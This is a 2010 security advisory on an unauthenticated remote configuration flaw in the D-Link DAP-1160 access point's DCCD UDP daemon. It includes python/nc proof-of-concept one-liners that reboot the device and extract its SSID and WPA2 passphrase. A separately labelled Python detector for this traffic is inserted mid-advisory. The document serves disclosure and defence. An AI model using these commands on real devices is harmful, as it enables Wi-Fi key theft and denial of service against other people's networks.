D-Link DAP-1160 Unauthenticated Remote Configuration

Published: 29 Jun 2010. Reported by Cristofaro Mune. Source: packetstorm (packetstormsecurity.com).

D-Link DAP-1160 unauthenticated remote configuration vulnerability in the DCCD UDP daemon.

Security Advisory  
  
IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration  
  
  
  
Advisory Information  
--------------------  
Published:  
2010-06-28  
  
Updated:  
2010-06-28  
  
Manufacturer: D-Link  
Model: DAP-1160  
Firmware versions: 1.20b06, 1.30b10, 1.31b01  
  
  
  
Vulnerability Details  
---------------------  
  
Public References:  
Not Assigned  
  
  
Platform:  
Successfully tested on D-Link DAP-1160 loaded with firmware versions:  
v120b06, v130b10, v131b01.  
Other models and/or firmware versions may also be affected.  
Note: Only firmware version major numbers are displayed on the  
administration web interface: 1.20, 1.30, 1.31  
  
  
Background Information:  
The D-Link DAP-1160 is a wireless access point that gives wireless clients  
connectivity to wired networks.  
It supports the 802.11b and 802.11g protocols, with WEP, WPA and WPA2 encryption.  
  
  
Summary:  
Unauthenticated access to, and modification of, several device parameters,  
including the Wi-Fi SSID, keys and passphrases, is possible.  
An unauthenticated remote reboot of the device can also be performed.  
  
  
Details:  
DCCD is a UDP daemon listening on UDP port 2003 of the device; it is  
likely used for easy device configuration via the DCC (D-Link Click  
'n Connect) protocol.  
By sending properly formatted UDP datagrams to the dccd daemon it is  
possible to perform security-relevant operations without any prior  
authentication.  
It is possible to remotely retrieve sensitive wireless configuration  
parameters, such as the Wi-Fi SSID, encryption types, keys and passphrases,  
along with other additional information.  
It is also possible to remotely modify such parameters and configure the  
device without any knowledge of the web administration password.  
Remote reboot is another operation that an attacker may perform in an  
unauthenticated way, possibly triggering a Denial-of-Service condition.  
  
  
POC:  
- Remote reboot  
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003  
  
- Retrieving Wi-Fi SSID  
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003  
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the received datagram)  
  
- Retrieving WPA2 PSK  
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003  
cat pass.txt (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)  
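Added here as a defender-side example, not part of the advisory: a small detector that flags DCCD requests to UDP/2003 and replies carrying the cleartext attributes described above, suitable for running over decoded pcap records. It assumes the request header layout and the 16-bit tag values exactly as the PoC datagrams send them, and assumes the "xx xx" bytes that follow a tag in a reply are a little-endian value length; the sample packets are constructed.

```python
import struct
from typing import Dict, Iterable, List, Optional, Tuple

DCCD_PORT = 2003
OPCODES = {0x03: "config-query", 0x05: "reboot"}
# Little-endian attribute tags as sent in the PoC; 0x2723 is unnamed in the advisory.
SENSITIVE_TAGS = {0x2721: "ssid", 0x2723: "attr-2723", 0x2724: "wpa2-psk"}

def tags_in(payload: bytes) -> List[int]:
    """Known attribute tags found after the 8-byte header (scanned, not at a fixed stride)."""
    body = payload[8:]
    return sorted(t for t in SENSITIVE_TAGS if struct.pack("<H", t) in body)

def classify_request(payload: bytes) -> Optional[dict]:
    """Classify a datagram sent to UDP/2003; None if it does not match the PoC header."""
    if len(payload) < 8 or payload[0] not in OPCODES or payload[1:8] != b"\x00" * 7:
        return None
    return {"op": OPCODES[payload[0]], "tags": [SENSITIVE_TAGS[t] for t in tags_in(payload)]}

def extract_response_values(payload: bytes) -> Dict[str, bytes]:
    """Tag/length/value entries in a datagram from UDP/2003. Assumption: the two
    bytes after a tag (the advisory's "xx xx") are a little-endian value length."""
    out = {}
    for tag, name in SENSITIVE_TAGS.items():
        pos = payload.find(struct.pack("<H", tag))
        if pos == -1 or pos + 4 > len(payload):
            continue
        length = struct.unpack_from("<H", payload, pos + 2)[0]
        out[name] = payload[pos + 4:pos + 4 + length]
    return out

def alerts(packets: Iterable[Tuple[int, int, bytes]]) -> List[str]:
    """packets: (src_port, dst_port, payload) triples, e.g. decoded from a pcap."""
    found = []
    for src, dst, data in packets:
        if dst == DCCD_PORT and (req := classify_request(data)):
            tags = ",".join(req["tags"])
            found.append(f"unauthenticated DCCD {req['op']} request" + (f" for {tags}" if tags else ""))
        elif src == DCCD_PORT and (vals := extract_response_values(data)):
            found.append("cleartext config left device: " + ", ".join(sorted(vals)))
    return found

# Constructed sample traffic: the two PoC requests (Python 2 print appends "\n"),
# a made-up reply carrying a 10-byte PSK under tag 0x2724, and an unrelated packet.
SAMPLE = [
    (40000, DCCD_PORT, b"\x05" + b"\x00" * 7 + b"\n"),
    (40001, DCCD_PORT, b"\x03" + b"\x00" * 7 + b"\x23\x27\x00\x00\x24\x27\x00\n"),
    (DCCD_PORT, 40001, b"\x03" + b"\x00" * 7 + b"\x24\x27\x0a\x00" + b"s3cretpass"),
    (40002, 53, b"\x03" + b"\x00" * 7),  # same bytes, wrong port: ignored
]
```

Running `alerts(SAMPLE)` yields one line per PoC request and one for the reply that carries the PSK; the mismatched-port packet is ignored.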
  
  
Impacts:  
Remote extraction of sensitive information  
Modification of existing device configuration  
Possible Denial-of-Service  
  
  
Solutions & Workaround:  
Not available  
  
  
  
Additional Information  
----------------------  
Timeline (dd/mm/yy):  
17/02/2010: Vulnerability discovered  
17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website  
18/02/2010: Point of contact requested to customer service  
----------- No response -----------  
26/05/2010: Partial disclosure at CONFidence 2010  
28/06/2010: This advisory  
  
  
Additional information available at http://www.icysilence.org  
